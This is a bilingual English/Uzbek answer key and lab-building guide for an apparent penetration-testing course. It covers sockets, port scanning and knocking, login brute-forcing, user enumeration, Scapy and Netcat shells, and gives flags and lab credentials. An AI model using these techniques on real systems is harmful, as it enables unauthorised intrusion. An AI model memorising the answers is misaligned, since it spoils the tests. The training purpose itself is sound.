Quyidagi sintaksisga qarang: `s.connect(("127.0.0.1", 9090))`. Bu yerda chaqirilayotgan socket metodi qanday turga tegishli?
A. Client
B. Server
C. Socket
D. General
Javob: A
3.
This is a scripting exercise. Use Python to connect to the server on port 2000 of the provided VM. When a client connects to the server, it will receive a certain response. With your Python script, send this exact response back to the server, and you will receive a second response. Your task is to send and receive 10 messages to and from the server within 15 seconds to obtain the flag. You only need to connect once.
Hint: Remember to change the socket.gethostname method for the IP address of the remote target machine. Check for off-by-one errors...
Bu skript yozish bo‘yicha mashq. Python yordamida taqdim etilgan VM ning 2000-portiga ulaning. Mijoz serverga ulanganida, ma’lum bir javob oladi. Python skriptingiz yordamida ushbu javobni aynan serverga qayta yuboring va ikkinchi javobni oling. Bayroqni olish uchun 15 soniya ichida serverga va serverdan jami 10 ta xabar yuborish va qabul qilish vazifasi sizga yuklangan. Siz faqat bir marta ulanishingiz kerak.
Hint: "Masofaviy maqsadli mashinaning IP manziliga o‘tish uchun `socket.gethostname` metodini o‘zgartirishni unutmang. Bitta qiymatga noto‘g‘ri xato (off-by-one error) bor-yo‘qligini tekshiring..."
Javob: HD{aylanib-aylanib-maqsadga-erishamiz!} | OS{all-around-the-merrygoround!} |
13.2.1 Error Handling:Try and Except Clauses
1
The server running on port 2001 of the provided VM is buggy; it only responds sometimes. Make sure that your client program has a means of handling errors and reconnecting. As in the previous exercise, connect 10 successful times in 15 seconds to obtain the flag.
Hint: Try using a for loop with an iterator to reconnect to the server if an exception occurs.
It may be helpful to create a method (function) to hold the code related to connecting. Then you can call that function in the except block.
Taqdim etilgan VM ning 2001-portida ishlayotgan serverda xatolar bor; u faqat ba’zan javob beradi. Mijoz dasturingizda xatolarni qayta ishlash va qayta ulanish imkoniyatini ta’minlashga ishonch hosil qiling. Oldingi mashqda bo‘lgani kabi, bayroqni olish uchun 15 soniya ichida 10 marta muvaffaqiyatli ulanishni amalga oshiring.
Hint: "Xatolik yuz berganda serverga qayta ulanish uchun iterator bilan `for` aylanmasi(loop)dan foydalanishga harakat qiling.
Ulanish bilan bog‘liq kodni alohida usul (funksiya) ichiga joylashtirish foydali bo‘lishi mumkin. Keyin ushbu funksiyani `except` blokida chaqirishingiz mumkin."
Javob: HD{Try_va_except_pitch_va_catch_ga_o'xshaydi_biri_xatolikni_ushlab_qoladi_biri_esa_qabul_qiladi} | OS{try-and-except-is-like-pitch-and-catch}
Senary
2001 portda sever ishlab turishi kerak foydalanuvchi bog’langanda bazan soroviga javob qaytarishi bazan esa qaytarmasligi kerak bo’ladi. Masalan 30 martda so’rov janatsa undan 10 tasi ga javob qaytarishi mumkin orasida uzulishlar bo’lgan holda va u 15 sekund ichida amalga oshirilishi kerak bo’ladi.
13.2.2 Handling Unknown Data Size
1
Connect to the server on port 2002 of the provided VM. The response you receive will be of unknown length, so build in some provisions in your client script to handle the responses using loops. You will need to connect to the server several times to receive the flag.
Hint: This server will disconnect when it is finished sending all the data it wants to send.
Try using a while True loop to keep receiving data until the server disconnects.
You don't need to send the data back to the server, only to figure out what you've received.
The data that's sent back from the server is meant to be viewed using image viewer software.
Taqdim etilgan VM ning 2002-portiga ulaning. Olayotgan javobingizning uzunligi noma’lum bo‘ladi, shuning uchun mijoz skriptingizda javoblarni qayta ishlash uchun looplardan foydalanishni ta’minlang. Bayroqni olish uchun serverga bir necha marta ulanishingiz kerak bo‘ladi.
Yordam: "Ushbu server yubormoqchi bo‘lgan barcha ma’lumotlarni yuborib bo‘lgach, ulanishni uzadi.
Ma’lumotlarni server uzilgunga qadar qabul qilish uchun `while True` loopidan foydalanishga harakat qiling.
Ma’lumotlarni serverga qayta yuborishingiz shart emas, faqat qabul qilgan narsalaringizni aniqlang.
Serverdan qaytarilgan ma’lumotlarni ko‘rish uchun tasvir ko‘rish dasturidan foydalanish kerak."
Javob: HD{Bu-flagning-belgilangan-uzunligi-yo'q!} | OS{this-flag-has-no-definite-length}
Senary
Bu yerda foydalanuvchi 2002 portga so’rov yuborilganda flag har hil uzunlikda yuboradi va foydalanuvchi loopdan foydalangan holda birlashtirb olshi kerak.
13.2.3 Interactive Sockets
1
Use your Python skills to connect to the server on port 2003 of the provided VM. The server will send any clients that connect to it some questions. Answer all the questions correctly to obtain the flag.
Python ko‘nikmalaringizdan foydalanib, taqdim etilgan VM ning 2003-portiga ulaning. Server ulanish qilgan har qanday mijozga savollar yuboradi. Bayroqni olish uchun barcha savollarga to‘g‘ri javob bering.
Javoblar: HD{Siz-savol-javob-ustasisiz!} | OS{You-are-a-trivia-guru!}
Senary
Bu yerda foydalanuvchi 2003 portda severga bog’lanishi kerak va unga matamatik oddiy savollar berilishi kerak va savollarga to’ri javob berganidan so’ng flag berilishi kerak.
13.3.2 Testing our Client and Server
1
What three methods do we need to implement in a server to allow remote clients to connect to it? Name the three methods in alphabetical order. Prepend each method with "socket." and separate them with a ', ' (comma space) so that your answer appears in this form: socket.Aanswer(), socket.Banswer(), socket.Canswer()
Hint: The solution to this exercise is in the format "socket.x(), socket.y(), socket.z()".
Check the listings in Building a Basic Server.
The first method is socket.accept()
Remember the focus is on a server receiving a connection.
Serverga masofaviy mijozlarning ulanib olishiga ruxsat berish uchun qaysi uchta usul(method)ni amalga oshirishimiz kerak? Uchta metodni alifbo tartibida nomlang. Har bir metodning boshiga "socket." qo‘shing va ularni ', ' (vergul va bo‘sh joy) bilan ajrating, shunda javob quyidagi ko‘rinishda bo‘ladi: socket.Aanswer(), socket.Banswer(), socket.Canswer().
Yordam: "Ushbu mashqning yechimi ""socket.x(), socket.y(), socket.z()"" formatida bo‘ladi.
**Asosiy serverni qurish** bo‘limidagi misollarni tekshiring.
Birinchi usul: `socket.accept()`.
E’tiboringizni serverga ulanishni qabul qilishga qaratishni unutmang."
Javoblar: socket.accept(), socket.bind(), socket.listen()
2
Fill in the blank. The socket.accept() method returns a ____ of values, conn and address?
Bo‘sh joyni to‘ldiring: `socket.accept()` metodi conn va address qiymatlarini qaytaradigan ____
Javoblar: pair
3
This is a scripting challenge. First, make sure that your server can accept at least four connections at once. Then, use SSH to login to the container running on port 2004 of the target VM with the credentials root:root. Run the binary located at /root to connect back to your server and receive the flag.
Bu skriptlash bo‘yicha sinov. Avval serveringiz bir vaqtning o‘zida kamida to‘rtta ulanishni qabul qila olishini ta’minlang. Keyin, `root:root` ma’lumotlari bilan nishon VMning 2004-portida ishlayotgan qurilmaga SSH orqali kirishingiz kerak. Serveringizga qayta ulanish va bayroqni olish uchun `/root` jildida joylashgan ikkilik(binary) faylni ishga tushiring.
Javoblar: HD{Sizga-bir-flag,-unga-bir-flag,-hamma-bir-flag-oladi!} | OS{You-a-flag-and-you-get-a-flag-and-you-get-a-flag}
Senary
Foydalanuvchi script yozishi kerak kamida 4 marta ulanish qabul qiladi server esa 4 marta ulanishni qabul qilishi kerak va shu to’g’ri bo’lgandan so’ng flag chiqishi kerak. Asosan serverni qabul 4 marta qabul qiluvchi kodni o’quvchi tuzadi Flagni esa ssh server yoqib 2004 portda root folderni ichiga compayler qilib joylashtirilishi kerak va foydalanuvchi shuni ishga tushirib o’zi yozgan serverga bog’lantiradi va shunda flag chiqadi.
13.4.1 Using the Socket Module to Create a Port Scanner
1
Recreate the port scanner in this section. Then, target the ports 3000 to 3999 of the target VM. In numerical order, what ports are open? Enter your answer in the following format: WWWW, XXXX, YYYY, ZZZZ
Ushbu bo‘limdagi port axtaruvchisini qaytadan yasang. So‘ng, nishon VM ning 3000 dan 3999 gacha bo‘lgan portlarini tekshiring. Raqamli tartibda qaysi portlar ochiq? Javobingizni quyidagi formatda kiriting: WWWW, XXXX, YYYY, ZZZZ
Javoblar: 3019, 3463, 3643
Senary
CTF Senariysi
Maqsad:
O‘quvchilar 3000–3999 diapazonidagi portlarni skanerlash orqali ochiq portlarni topishlari kerak. Ochiq portlar raqamli tartibda topilgach, ularni berilgan formatda yozib chiqishlari kerak.
13.4.2 Port Knocking
1
Modify your port scanner so that it knocks precisely and in numerical order on the eight ports that have Pronic numbers in the range 4000 to 4999. You may need to look up the definition of "Pronic number" to determine which ports to scan. Once you have performed the port knocking sequence, use the credentials Aristotle:Lyceum to SSH to the newly opened port 2222. Look for the flag in the user's home directory or the user's desktop. What is that flag?
Hint: Check out the Wikipedia article on the number 4000. You may need to run the port knocking sequence and initiate the SSH connection multiple times.
Port axtaruvchisini shunday o‘zgartiringki, u 4000 dan 4999 gacha bo‘lgan diapazondagi Pronic sonlar bo‘lgan sakkiz portga aniq va raqamli tartibda "knock" qilsin. Qaysi portlarni tekshirish kerakligini aniqlash uchun "Pronic number" tushunchasini izlab ko‘rishingiz mumkin. Port taqillatish(knocking) jarayonini bajarganingizdan so‘ng, `Aristotle:Lyceum` ma’lumotlari bilan 2222-portga SSH orqali kiring. Foydalanuvchining home jildi yoki desktopida joylashgan bayroqni qidiring. Bayroq qanday?
Yordam: 4000 raqamiga bag'ishlangan Vikipediya maqolasini ko'rib chiqing. Siz port knocking ketma-ketligini bajarib, SSH ulanishini bir necha marta boshlashingiz kerak bo'lishi mumkin.
Javob: HD{Sonlar-nazariyasi-kriptografiya-uchun-foydali!} | OS{number-theory-is-useful-for-cryptography!}
Senary
Pronic Port Knocking
O‘quvchilar 4000–4999 portlar orasidagi Pronic sonlar asosida knocking bajarib, port 2222 ni ochishadi. Keyin esa SSH orqali ulanishadi va flagni topishadi.
Bosqichma-bosqich Ko‘rsatma
1. Pronic sonlarni aniqlash
Pronic sonlar – bu formulaga asosan hisoblanadi:
n * (n + 1)
Bu sonlar biror son bilan undan keyingi sonning ko‘paytmasiga teng bo‘ladi. Misol:
Siz 4000–4999 diapazonidagi barcha Pronic sonlarni topishingiz kerak.
2. Nishon VMga knockingni sozlash
Knocking – bu xavfsizlik mexanizmi bo‘lib, maxsus portlarga ketma-ket knocking (tapping) qilinishi kerak. Faqat to‘g‘ri knocking ketma-ketligi bajarilganda port 2222 ochiladi.
Nishon VM sozlash:
3. Flag yaratish
Flag faylni foydalanuvchining uy katalogida yoki ish stolida saqlang. Masalan:
4. O‘quvchilar uchun Python skript
5. Vazifa tavsifi
O‘quvchilar uchun vazifa tavsifi shunday bo‘ladi:
Flag format:
OS{number-theory-is-useful-for-cryptography!}
O‘quvchilar uchun Hint
13.5.1 The Transport Layer: Using the Python Sockets Module with HTTP
1
Recreate the script and modify it to reach www.megacorpone.com . What popular operating system distribution is www.megacorpone.com running on?
Skriptni qayta yarating va uni `www.megacorpone.com` ga ulanish uchun o‘zgartiring. `www.megacorpone.com` qaysi mashhur operatsion tizim tarqatmasi(distrosi)da ishlayotganini aniqlang!
Javoblar: Debian
Senary
bu saytni o’rniga haady ga oid yoki haad ga oid biron sayt ko’tarish kerak va o’quvchi skript yaratgan holda buni ma’lumotlarini olishi kerak yani qaysi operatsionda tizimda ishlashini chiqarib berishi kerak Os esa Debian bo’lsa yaxshiroq. Quyida qanday ishlash tartibi yozilgan
CTF topshirig‘i tahlili
Yechim bosqichlari
1. Kerakli vositalarni o‘rnating
2. Skriptni yaratish
Skriptni quyidagicha yozamiz:
3. Skriptni ishga tushirish
4. Javobni tahlil qilish
5. Muammolarni hal qilish
Agar HTTP headerda Server haqida ma’lumot ko‘rsatilmasa:
Misol yechim natijasi
2
What branch of technology does MegaCorp One focus on? Use the HTML code from the server's response to answer this question.
MegaCorp One qaysi texnologiya sohasi bilan shug‘ullanadi? Ushbu savolga javob berish uchun server javobidagi HTML koddan foydalaning.
Javoblar: Nanotechnology
Senary
O’zimiz ko’targan saytni qaysi texnologiya sohasi bilan shug’ullanishini topishi kerak.
13.5.2. The Application Layer: GET Requests with Python
1
Why can't we call our Python HTTP client "http.py"?
A. Because Python3 doesn't work with http.
B. Because Python3 has another module called http.py.
C. Because Python3 cannot execute multiple web-clients at the same time.
"Nega biz Python HTTP mijozimizni ""http.py"" deb atay olmaymiz?
A. Chunki Python3 http bilan ishlamaydi.
B. Chunki Python3-da http.py deb nomlangan boshqa modul bor.
C. Chunki Python3 bir vaqtning o'zida bir nechta veb-mijozlarni bajarolmaydi."
Javob: B
2
Write a Python script to do a HTTP GET request on port 8080 of the target VM and get the webpage content. What is the flag on the index.html page?
Python skript yozing, u nishondagi VM'ning 8080-portida HTTP GET so'rovini bajarib, veb-sahifa mazmunini olsin. `index.html` sahifasidagi flag(bayroq) qanday?
Javob: HD{Bu-pythonning-haqiqiy-g'alvasi!} | OS{its-a-python-pandemonium!}
senary
web server ko’tarish kerak va bundan keyingi ctflar shu web server orqali yechiladi. Hozirgi ctfda esa 8080 portini orqali ishlaganda flag chiqariladi.
3
Write a Python script to do an HTTP GET request on port 8080 at /1.html. This site will give you the first character of the flag. The directories /2.html to /50.html will give you the remaining characters. What is the complete flag?
Python skript yozing, u 8080-portda `/1.html` bo'yicha HTTP GET so'rovini amalga oshirsin. Ushbu sayt flagning birinchi belgisini beradi. `/2.html` dan `/50.html` gacha bo'lgan yo'nalishlar flagning qolgan belgilarini beradi. To'liq flag qanday?
Javob: HD{Siz-bu-flagning-to'liq-matnini-topa-olasizmi-XYZ?} | OS{can-you-guess-the-full-text-of-this-flag-XYZ?}
Senary
Veb-serverni sozlash:
Tizimingizda (masalan, Kali Linux yoki Ubuntu) HTTP serverni o‘rnating (Apache yoki Python SimpleHTTPServer).
Flagni belgilar bo‘lib 50 ta faylga (1.html, 2.html, ... 50.html) joylashtiring. Har bir faylda flagning bir qismi yozilsin.
Tarmoq sozlamalari:
Serverni 8080-portda ishlaydigan qilib sozlang.
Ishtirokchilar ushbu port orqali ulanishadi.
Skript yozish vazifasi:
Talabalar Python skripti yozib, 1.html dan 50.html gacha GET so‘rov yuborib, flagni yig‘ishlari kerak.
Javoblarni birlashtirish orqali yakuniy flagni hosil qilishadi.
13.5.3. Parsing HTML
1
The website on port 8080 of the target VM has multiple pages under the directory /crawling. Use your Python skills to GET the content on all the pages and find the flag.
Nishon VMning 8080-portidagi veb-sayt /skanerlash jildi ostida bir nechta sahifalarga ega. Python bilimlaringizdan foydalanib, barcha sahifalarning mazmunini olish uchun GET so‘rovlarini yuboring va bayroqni toping.
Javob: HD{Devorda-osilib-turgan-o'rgimchak} | OS{spider-spider-on-the-wall}
Senary
web saytni /skanerlash papkasida shunga o’xshash sahifa yaratilishi kerak va ko’rinib turgan qator qilib yozilgan ma’lumotlar papkalar hisoblanadi va bularni istalgan biriga flagni yaratilishi kerak papkalar honyput qilinishi kerak ya’ni papka ichida papkalar davom etib ketishi kerak har birini 10 yoki 20 va ularni ham ichida shuncha papkalar 2 yoki 3 marotaba takrorlanishi kerak.
2
Visit the website on port 8080 of the target VM under the /table directory. The table found on the page contains the flag, but each row contains a different letter. Use Python to make a request to this page and parse the response.
Nishon VMning 8080-portidagi veb-saytga /table jildi orqali tashrif buyuring. Sahifadagi jadval flagni o‘z ichiga oladi, lekin har bir qatorda boshqa harf joylashgan. Ushbu sahifaga so‘rov yuborish va javobni tahlil qilish uchun Pythondan foydalaning.
Javob: HD{Bu-dunyoning-eng-qiziqarli-jadvali!} | OS{this-is-the-most-interesting-table-in-the-WORLD-}
Senary
veb saytni /table pakasiga kirganda shunday jadvalga o’xshash qilib sahifa tayorlanishi kerak flag esa jadvalda ketma ketlikda joylashtirilishi kerak va o’quvchi yig’ishi kerak bo’ladi skrip orqali
13.6.1. Post Requests and Parameters with Python
1
The website on port 8080 of the target VM has multiple pages under the directory /crawling. Use your Python skills to GET the content on all the pages and find the flag.
Nishon serverning 8080-portidagi /basic-post/ nomli sahifa faqat POST so‘rovlarini qabul qiladi. Flagni olish uchun ushbu sahifaga har qanday POST so‘rovini yuborib ko'ring.
Javob: HD{Tezroq!-bu-flagni-darhol-kiriting!} | OS{Quickly!-enter-this-flag-posthaste!}
Senary
yaratgan veb saytda /basic-post/ sahifasiga kirganda o’zbek tilida shunga so’zlar chiqishi kerak
Salom, men faqat POST ma'lumotlarini qabul qiladigan veb-sahifaman. "haady" parametriga har qanday POST ma'lumotlarini yuboring.
O’quvchi POST so'rovini yuborib, kerakli parametrni (masalan, haady=correct_value) qo'shib, serverdan flagni olishlari kerak. Agar to'g'ri qiymat yuborilsa, server flagni qaytaradi.
2
You can authenticate to the page at port 8080 of the target server called /login-1 with the username 'thobbes' and the password 'leviathan'. Make a POST request to the page with the above credentials to get the flag.
Nishon serverning 8080-portidagi /login-1 sahifasiga 'thobbes' foydalanuvchi nomi va 'leviathan' paroli bilan tasdiqlanishingiz mumkin. Yuqoridagi ma’lumotlar bilan POST so‘rovini ushbu sahifaga yuborib, flagni oling.
Javob: HD{Bu-kinoyalar-endi-juda-nazariga-tushadigan-bo'lib-bormoqda} | OS{These-puns-are-becoming-preposterous}
Senary
endi shu veb serverda /login-1 degan sahifasiga kirsa shunday chiqaradi. O’quvchi flagni olsh uchun skrip yozish orqali olashi kerak bo’ladi. login parolni o’quvchi to’g’ri yozganda chiqishi kerak flag
o’quvchi shunga o’xshash skrip yozib ishlatganidan so’ng flagni berishi kerak bo’ladi
3
You can authenticate to the page at port 8080 of the target server called /login-2 with the username 'rdescartes' and the password 'discourse'... however, the password is followed by the five characters: ! @ # % & in some unknown order. For example, the password might be discourse#!@&%, or it might be discourse%&@!#. Use Python to iterate through all possible POST requests to determine the password, and log in to get the flag.
Nishon serverning 8080-portidagi /login-2 sahifasiga 'rdescartes' foydalanuvchi nomi va 'discourse' paroli bilan tasdiqlanishingiz mumkin... biroq, paroldan keyin ! @ # % & belgilarining qandaydir noma'lum tartibdagi beshta birikmasi qo'shilgan. Masalan, parol discourse#!@&% yoki discourse%&@!# bo'lishi mumkin. Parolni aniqlash va flagni olish uchun barcha mumkin bo‘lgan POST so‘rovlarini Python yordamida takroran sinab chiqing.
Javob: HD{Men-bu-kinoyalarni-mukammal-deb-aks-etaman} | OS{I-postulate-that-these-puns-are-perfect}
Senary
Bu CTF vazifasida, maqsadli sahifaga autentifikatsiya qilish kerak, lekin parol oxirida "special characters" bo'lib, ular aralashgan va ma'lum tartibda joylashgan. Sizning vazifangiz, Python yordamida barcha mumkin bo'lgan POST so'rovlarini yuborib, to'g'ri parolni aniqlash va login bo'lib, flagni olishdir. Keling, qanday qilib bu vazifani tuzish va yechishni tushuntirib beray.
1. Vazifa maqsadi:
Sizga rdescartes foydalanuvchi nomi va discourse parol beriladi. Ammo parolning oxirida !, @, #, %, & simvollari mavjud va ular tasodifiy tartibda joylashgan. Vazifa, bu 5 ta simvolning barcha mumkin bo'lgan kombinatsiyalarini ko'rib chiqish va to'g'ri parolni aniqlashdir. To'g'ri parolni topganingizdan so'ng, siz autentifikatsiya bo'lib, flagni olishishingiz kerak.
2. Python skriptini yaratish:
Skriptda Python yordamida barcha mumkin bo'lgan kombinatsiyalarni (5 ta maxsus belgi) yaratib, har birini POST so'rovi yuborish orqali sinab ko'ramiz. Agar to'g'ri kombinatsiya yuborilsa, login muvaffaqiyatli bo'ladi va flagni olish mumkin bo'ladi.
2.1. POST so'rovi yuborish:
2.2. Python kodini yozish:
3. Qadamlar tushuntirish:
3.1. Python kutubxonalarini import qilish:
3.2. Barcha kombinatsiyalarni olish:
itertools.permutations(special_chars) yordamida 5 ta maxsus belgining barcha kombinatsiyalarini olamiz. Bu 120 ta kombinatsiya beradi (5 ta elementdan 5 tasi tanlangan).
3.3. POST so'rovlarini yuborish:
Har bir kombinatsiyani discourse paroliga qo'shib, serverga POST so'rovini yuboramiz. Agar server javobida "Flag" so'zi bo'lsa, bu to'g'ri parolni topganimizni anglatadi.
3.4. Muvaffaqiyatli login:
Agar parol to'g'ri bo'lsa, Flagni olishimiz mumkin bo'ladi. Flagni ekranga chiqaramiz va skriptni to'xtatamiz.
4. Vazifani yaratish:
4.1. Flask yordamida POST so'rovlarini qabul qiladigan sahifa yaratish:
Bu kodda /login-2 URL manziliga POST so'rovi yuborilganida, foydalanuvchi nomi va parol tekshiriladi. Agar to'g'ri parol yuborilsa, flag qaytariladi.
4.2. Flask serverini ishga tushurish:
5. Test qilish:
4
The page on port 8080 of the target server called /bijection accepts an integer value that corresponds to the letter position of the flag. For example:
/bijection?index=0 will return the character 'O'
/bijection?index=1 will return the character 'S'
/bijection?index=2 will return the character '{'
Use your Python skills to create a script that will get the entire flag. Note, that the page will only accept POST requests!
Nishon serverning 8080-portidagi /bijection sahifasi flagdagi harf pozitsiyasiga mos keladigan butun son qiymatini qabul qiladi. Masalan: /bijection?index=0 so‘rovi 'O' belgini qaytaradi
/bijection?index=1 so‘rovi 'S' belgini qaytaradi
/bijection?index=2 so‘rovi '{' belgini qaytaradi
Python yordamida flagning to‘liq matnini olish uchun skript yarating. Eslatma, sahifa faqat POST so‘rovlarini qabul qiladi!
Javob: HD{Xush-xabar...bu-juda-ta'sirli-javob} | OS{touche...that’s-quite-the-impressive-reposte}
Senary
/bijection sahifasi bo’ladi va uni ichida ko’rsatilgan /bijection?index=1 shunga o’xshash larga so’rov yuborsa flagni chiqarishi kerak faqatgina post sorovi orqali skript ishlagan holda bo’lishi kerak.
13.6.2. Request Header and Non-Text-based Content
1
The directory at port 8080 of the target server called /headers has ten subpages called /headers/1 through /headers/10. Each page has a custom header called "Flag" that contains a portion of the flag. Use Python to piece together all the components of the flag.
Nishon serverning 8080-portidagi `/headers` jildida `/headers/1` dan `/headers/10` gacha bo'lgan o'n ta kichik sahifa mavjud. Har bir sahifada "Flag" deb nomlangan maxsus header bor, u bayroqning bir qismini o'z ichiga oladi. Python yordamida flag(bayroq)ning barcha qismlarini birlashtiring.
Javob: HD{O'n-10-To'qqiz-9-Sakkiz-8-777-O'nBesh-15-To'rt-4-Uch-3-Ikki-Bir-1} | OS{ten-9-eight-777-sicks-5-for-thre33-too-1-}
Senary
Topshiriqni o’zi tushnarliroq yozilgan
2
The page at port 8080 of the target server called /object returns a binary that when run, prints out the flag. Use Python to save the binary and then run it to get the flag.
Nishon serverning 8080-portidagi `/object` sahifasi ikkilik faylni qaytaradi, uni ishga tushirganda bayroq chiqaradi. Python yordamida ikkilik faylni saqlang va keyin uni ishga tushirib, bayroq(flag)ni oling.
Javob: HD{Qancha_olishni_bilsang,_shuncha_ol} | OS{don’t-byte-off-more-than-you-can-chew}
Senary
/object sahifasiga kirganda binary file yuklab oladi va o’quvchi o’zini o’zini qurilmasida ishlatadi shunda flagni chiqaradi
3
The page at port 8080 of the target server called /about.html contains a list of 30 employees, their email addresses, and their favorite colors. Only one of these users can log in to the page at /login-3. Use Python to determine which user has a valid account by analyzing the responses to your requests. What is the first name of the valid user?
Nishon serverning 8080-portidagi `/about.html` sahifasida 30 nafar xodim, ularning elektron pochta manzillari va sevimli ranglari ro‘yxati mavjud. Ushbu foydalanuvchilardan faqat bittasi `/login-3` sahifasiga tizimga kirishi mumkin. Python yordamida so'rovlarga javoblarni tahlil qilib, qaysi foydalanuvchi haqiqiy hisobga ega ekanligini aniqlang. Haqiqiy foydalanuvchining ismi nima?
Javob: Damian
Senary
Bu CTF vazifasida, sizga maqsadli serverning 8080-portida joylashgan /about.html sahifasida 30 nafar xodimning ismlari, email manzillari va ularning sevimli ranglari ro'yxati beriladi. Ushbu xodimlardan faqat biri /login-3 sahifasiga muvaffaqiyatli kirish huquqiga ega. Vazifangiz, Python yordamida bu foydalanuvchini aniqlash va uning ismini topishdir.
Vazifaning maqsadi:
Vazifani qanday tuzish mumkin?
Bu vazifani yaratishda quyidagi bosqichlarni ko'rib chiqamiz:
1. /about.html sahifasini yaratish:
/about.html sahifasi 30 ta xodimning ma'lumotlarini ko'rsatadi. Har bir xodimning ismi, email manzili va sevimli rangi bo'ladi.
Flask yordamida sahifani yaratish:
Bu Flask kodida 30 ta xodim ro'yxati berilgan. Ular /about.html sahifasida ko'rsatiladi.
2. /login-3 sahifasini yaratish:
/login-3 sahifasi POST so'rovlarini qabul qiladi va foydalanuvchining autentifikatsiyasini tekshiradi. Faol foydalanuvchi ro'yxatni tekshirish uchun email manzili va rang ma'lumotlarini so'rashi mumkin.
Bu yerda alice@example.com email manzili va blue rangi to'g'ri foydalanuvchiga tegishli. Agar bu ma'lumotlar to'g'ri bo'lsa, login muvaffaqiyatli bo'ladi va flag ko'rsatiladi.
3. Python yordamida POST so'rovlarini yuborish:
Endi, Python yordamida /login-3 sahifasiga POST so'rovlarini yuboramiz. Har bir foydalanuvchi uchun email va rangni yuborib, to'g'ri foydalanuvchini aniqlaymiz.
Python skriptini yozish:
4. Tushuntirish:
4.1. /about.html sahifasini tahlil qilish:
4.2. POST so'rovlarini yuborish:
5. CTFni qanday tuzish:
6. Natija:
13.7.4. Saving Packets with Scapy
1
What function can be used in Scapy to sniff traffic?
Scapyda tarmoq trafigini ushlab olish uchun qaysi funksiyadan foydalanish mumkin?
Javob: sniff()
2
What parameter to sniff() would you need to provide to capture a total of 3000 packets from the wire?
3000 ta paketni tarmoqdan ushlab olish uchun `sniff()` funksiyasiga qaysi parametrni berishingiz kerak?
Javob: count
13.7.7. Sending and Receiving a Response from Scapy
1
Complete the following exercises with the in-browser Kali client.
Send an IP packet to the server listening on port 9876. The IP packet must arrive at the target server with a TTL of 99, and does not need to contain any data.
Quyidagi mashqlarni brauzer orqali ishlaydigan Kali mijozida bajaring:
9876-portda tinglayotgan serverga IP-paket yuboring. IP-paket nishon serverga TTL qiymati 99 bo‘lib yetib borishi kerak va hech qanday ma'lumotni o‘z ichiga olishi shart emas.
Javob: HD{Ko'proq_flag_uchun_vaqt_keldi!} | OS{time-to-live?More-like-time-to-FLAG!}
2
Send an ICMP packet to the server listening on port 9876. The ICMP packet should contain the data "Hello, Offsec!".
9876-portda tinglayotgan serverga ICMP paket yuboring. ICMP paket tarkibida "Hello, Haady!" ma'lumoti bo‘lishi kerak.
Javob: HD{Nega...salom_sizga_ham_muhandis!} | OS{Why...hello-to-you-too...scholar!}
3
Send a UDP packet to the server listening on port 9876.
Hint: The browser-based Kali and the VPN-based Kali require different starting TTL values. Can you figure out why? Use ping to determine how much the TTL is decremented along the route to the target host and adjust your starting TTL accordingly.
9876-portda tinglayotgan serverga UDP paket yuboring.
Yordam: Brauzerga asoslangan Kali va VPN orqali ishlaydigan Kali turli boshlang‘ich TTL qiymatlarini talab qiladi. Nima uchunligini aniqlay olasizmi? Ping yordamida nishon hostga yetguncha TTL qancha kamayishini aniqlang va boshlang‘ich TTL qiymatini shunga qarab moslang.
Javob: HD{O'ylaymanki_buni_boshqa_joyga_yuborishni_niyat_qilganding_har_holda_flagni_ol!} |
OS{I-think-you-meant-to-send-this-elsewhere...have-a-flag-anyway}
4
Send a TCP ACK packet to the server listening on port 9876, with the source port of 22.
22-port manba sifatida ko'rsatilgan holda, 9876-portda tinglayotgan serverga TCP ACK paket yuboring.
Javob: HD{Hey!Sen-SSH-Kabi-Ko'rinmaysan?!} | OS{Hey!You-Dont-Look-Like-SSH?!}
14. Working with Shells
14.1.2
1
Which of the following shells are made for Windows systems? (Enter the letter of the correct answer)
A. sh
B. PowerShell
C. bash
D. terminal
Quyidagi qobiqlardan qaysi biri Windows tizimlari uchun yaratilgan? (To‘g‘ri javobning harfini kiriting)
A. sh
B. PowerShell
C. bash
D. terminal
Javob: B. PowerShell
2
Which shell is more commonly found on Free-BSD systems? (Enter the letter of the correct answer)
A. tcsh
B. bash
C. cmd
D. zsh
Qaysi qobiq odatda Free-BSD tizimlarida ko‘proq uchraydi? (To‘g‘ri javobning harfini kiriting)
A. tcsh
B. bash
C. cmd
D. zsh
Javob: A. tcsh
3
Which shell has features from bash, csh, and tcsh? (Enter the letter of the correct answer)
A. cmd
B. bash
C. ksh
D. zsh
Qaysi qobiq bash, csh va tcsh funksiyalariga ega? (To‘g‘ri javobning harfini kiriting)
A. cmd
B. bash
C. ksh
D. zsh
Javob: D. zsh
14.2.3
1
Which machine (Windows or Kali) acted as the Netcat server?
Qaysi mashina (Windows yoki Kali) Netcat server sifatida ishladi?
Javob: Windows
2
Which machine (Windows or Kali) acted as the Netcat client?
Qaysi mashina (Windows yoki Kali) Netcat mijoz sifatida ishladi?
Javob: Kali Linux.
3
On which machine (Windows or Kali) was port 4444 opened?
Qaysi mashinada (Windows yoki Kali) 4444-port ochilgan edi?
Javob: Windows
4
What Netcat option sets up a listener (including the -)?
Netcatda tinglovchi rejimni o‘rnatish uchun qaysi parametr ishlatiladi (shu jumladan `-` belgisi)?
Javob: -l
5
What Netcat option sets up the port (including the -)?
Netcatda portni o‘rnatish uchun qaysi parametr ishlatiladi (shu jumladan `-` belgisi)?
Javob: -p
14.2.6
1
Make a standard Netcat connection with the host on port 555. Press ENTER after the connection is established. The flag is the answer.
555-portda xost bilan standart Netcat ulanishini yarating. Ulanish o‘rnatilgandan so‘ng ENTER tugmasini bosing. Flag javob hisoblanadi.
Javob: NC{Such_Connection} | NC{Mustahkam_Aloqa}
Senary
biron ip ga ssh bilan ulanib chiqib ketishi kerak. undan so’ng nc -nv ip ni orqali tergandan so’ng flagni berishi kerak. nc tergandan so’ng Enter bosganidan keyin Ip berishi kerak.
2
Start a Netcat listener on port 4444 and wait a minute for the flag to appear.
4444-portda Netcat tinglovchisini ishga tushiring va flag paydo bo‘lishini bir daqiqa kuting.
Javob: NC{Now_I_Connect_To_You} | NC{Hozir_Sizga_Ulanmoqdaman}
Senary
4444 portni netcat orqali eshtgandan so’ng flag kelishi kerak.
3
Connect to a Netcat shell session on the host on port 456. The flag will be in the /nc directory.
Hint: It's not always necessary to use the -e option
456-portda hostdagi Netcat qobiq sessiyasiga ulang. Flag `/nc` jildida bo‘ladi.
Yordam: Har doim ham `-e` parametridan foydalanish shart emas.
Javob: NC{Bind_The_Shell} | NC{Shellni_Biriktir}
Senary
nc orqali ipga bog’lnadi va uni ichida quydagi filelar bo’ladi va NC-flag1.txt file ham bo’ladi shuni ochgandan so’ng flag chiqishi kerak.
4
